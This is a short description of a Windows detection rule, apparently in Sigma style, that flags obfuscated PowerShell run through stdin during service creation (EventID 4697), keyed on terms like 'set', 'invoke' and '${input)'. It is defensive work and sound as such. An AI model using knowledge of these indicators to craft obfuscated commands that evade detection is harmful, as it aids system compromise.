This detection rule monitors for obfuscated PowerShell commands executed through standard input (stdin) within Windows systems. It specifically identifies instances where the `EventID` 4697 is triggered, indicating the creation of a service. The rule looks for specific keywords associated with obfuscated PowerShell scripts, such as 'set', 'environment', 'invoke', and the presence of `${input)`, which suggests that the input might be manipulated or crafted for malicious purposes. By focusing on these parameters in service file names, this rule aims to detect sophisticated attempts to execute malware or perform system compromise while evading detection mechanisms. The rule requires that the 'System Security Extension' audit subcategory is enabled to ensure proper logging of these events. Given the dynamic nature of obfuscation techniques, these indicators are essential to recognize potentially harmful scripts that leverage PowerShell's capabilities for malicious intents.